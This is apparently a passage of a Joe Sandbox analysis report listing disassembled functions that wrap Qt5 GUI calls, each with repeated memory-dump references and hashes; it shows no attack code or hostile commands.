                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Standard$?takeHeaderItemItem@Item@@Model@@Vertical
                                                                                                                                                                                                                                          • String ID: QStandardItemModel$takeVerticalHeaderItem$takeVerticalHeaderItem(self, row: int) -> Optional[QStandardItem]
                                                                                                                                                                                                                                          • API String ID: 3666662607-150036698
                                                                                                                                                                                                                                          • Opcode ID: cdaed4e039946b14e5c7ff13ad6937159044d2227ceb6a367378d7569afd5bbe
                                                                                                                                                                                                                                          • Instruction ID: a672be059036d45fb063903ffff4a1504770ea79a3b29083f959c9cbb28c397a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cdaed4e039946b14e5c7ff13ad6937159044d2227ceb6a367378d7569afd5bbe
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4811F536A19E46C6EB10DF11E8896A933A5FB44FD4F918032DA8E43320EF39E959C744
                                                                                                                                                                                                                                          Function 00007FF89D965E00 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?frameMargins@QWindow@@QEBA?AVQMargins@@XZ.QT5GUI ref: 00007FF89D965E58
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?frameMargins@Margins@@Window@@malloc
                                                                                                                                                                                                                                          • String ID: QWindow$frameMargins$frameMargins(self) -> QMargins
                                                                                                                                                                                                                                          • API String ID: 1734882684-3586196236
                                                                                                                                                                                                                                          • Opcode ID: 769789fdcdfacb6b60557f3c9e15e230b8b9f4a9ce0cfa07370cb31abae4c5ea
                                                                                                                                                                                                                                          • Instruction ID: a2ef9a90649ae01f44b8c728186456069447ecef686acf77bec5e90b9bcbccf3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 769789fdcdfacb6b60557f3c9e15e230b8b9f4a9ce0cfa07370cb31abae4c5ea
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5711F777A08A46C2EB10DF65E8896A933A4FB44FD4F914032D99E07320EF7CE559C744
                                                                                                                                                                                                                                          Function 00007FF89D969E00 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?alignment@QTextTableFormat@@QEBA?AV?$QFlags@W4AlignmentFlag@Qt@@@@XZ.QT5GUI ref: 00007FF89D969E58
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?alignment@AlignmentFlag@Flags@Format@@Qt@@@@TableTextmalloc
                                                                                                                                                                                                                                          • String ID: QTextTableFormat$alignment$alignment(self) -> Qt.Alignment
                                                                                                                                                                                                                                          • API String ID: 410347170-1208340909
                                                                                                                                                                                                                                          • Opcode ID: 6b17a99f599955371270d71f4ff11c23288da743570c381190cfa2d99d2ddf4b
                                                                                                                                                                                                                                          • Instruction ID: 47bb31a6957d55072af1ef37cb443d39c9ca69d8a16cfec9ace656a3818aeae3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6b17a99f599955371270d71f4ff11c23288da743570c381190cfa2d99d2ddf4b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 29112377A09A46C5EB109F65E8896A933A4FB44FD0F918032DA8E07324EF3CE599C344
                                                                                                                                                                                                                                          Function 00007FF89D98BE10 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?toPoint@QVector2D@@QEBA?AVQPoint@@XZ.QT5GUI ref: 00007FF89D98BE68
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Point@Point@@Vector2malloc
                                                                                                                                                                                                                                          • String ID: QVector3D$toPoint$toPoint(self) -> QPoint
                                                                                                                                                                                                                                          • API String ID: 832002611-158562034
                                                                                                                                                                                                                                          • Opcode ID: cf5b0fe2694ab808fd060cb70a43f94e7cb16deb7aeffb7eb3e9e802f6783953
                                                                                                                                                                                                                                          • Instruction ID: de780554035eb0b466e7094ee1f7ba0b05e6018050582c51f8d8cf6ba73c3fde
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cf5b0fe2694ab808fd060cb70a43f94e7cb16deb7aeffb7eb3e9e802f6783953
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6C11F777A08A4681EB109F65E84A6A933A4FB44FD4F918032CA9E07320EF7DE559C744
                                                                                                                                                                                                                                          Function 00007FF89D999A10 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?window@QPainter@@QEBA?AVQRect@@XZ.QT5GUI ref: 00007FF89D999A68
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?window@Painter@@Rect@@malloc
                                                                                                                                                                                                                                          • String ID: QPainter$window$window(self) -> QRect
                                                                                                                                                                                                                                          • API String ID: 83040069-2596992568
                                                                                                                                                                                                                                          • Opcode ID: d8bbe2d7eaf7efd1a49bdc1c98b93d1dbf27503f3511cc9cfe91f2d5abf30646
                                                                                                                                                                                                                                          • Instruction ID: 58e7bbca424a0d0dbfd702086db0dc55fdd7a743a071c223e6af3e3804ed7c42
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d8bbe2d7eaf7efd1a49bdc1c98b93d1dbf27503f3511cc9cfe91f2d5abf30646
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 05110977A09A4692EB109F65E84A6A933E4FB44FD0F918032C98E07320EF7DF559C344
                                                                                                                                                                                                                                          Function 00007FF89D963E10 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?sizeIncrement@QWindow@@QEBA?AVQSize@@XZ.QT5GUI ref: 00007FF89D963E68
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?sizeIncrement@Size@@Window@@malloc
                                                                                                                                                                                                                                          • String ID: QWindow$sizeIncrement$sizeIncrement(self) -> QSize
                                                                                                                                                                                                                                          • API String ID: 2710399533-4120804601
                                                                                                                                                                                                                                          • Opcode ID: b7dd395e7bdabe8ac9de9d923dc2654eb6ee84adc161714de803ff5b3cd8b1fb
                                                                                                                                                                                                                                          • Instruction ID: 4760bdf9c6680a5e2be528cf995719bc2f2222f042385f88fca8c4889a3d6f96
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b7dd395e7bdabe8ac9de9d923dc2654eb6ee84adc161714de803ff5b3cd8b1fb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 13110977A08A4681EB10DF65E8496A933A4FB44FD0F918032D99E07324EF7DE559C744
                                                                                                                                                                                                                                          Function 00007FF89D9A7E50 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?toBlockFormat@QTextFormat@@QEBA?AVQTextBlockFormat@@XZ.QT5GUI ref: 00007FF89D9A7EA8
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: BlockFormat@@Text$Format@malloc
                                                                                                                                                                                                                                          • String ID: QTextFormat$toTableFormat$toTableFormat(self) -> QTextTableFormat
                                                                                                                                                                                                                                          • API String ID: 2120409781-1785544545
                                                                                                                                                                                                                                          • Opcode ID: 913d73b3f5b7ab7159e1768e870c25f500cd697764dc8db108c4fde8e34c98e8
                                                                                                                                                                                                                                          • Instruction ID: 20bfedd0ff02946dc79753c51cd37a80fb3edbaa0493aa4dcf4eb1df24ec0444
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 913d73b3f5b7ab7159e1768e870c25f500cd697764dc8db108c4fde8e34c98e8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9C110977A09A46D5EB10DF61E8496A933A4FB84FD0F918032C98E47320EF7DE559C744
                                                                                                                                                                                                                                          Function 00007FF89D9B7D80 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?toVector4D@QQuaternion@@QEBA?AVQVector4D@@XZ.QT5GUI ref: 00007FF89D9B7DD8
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
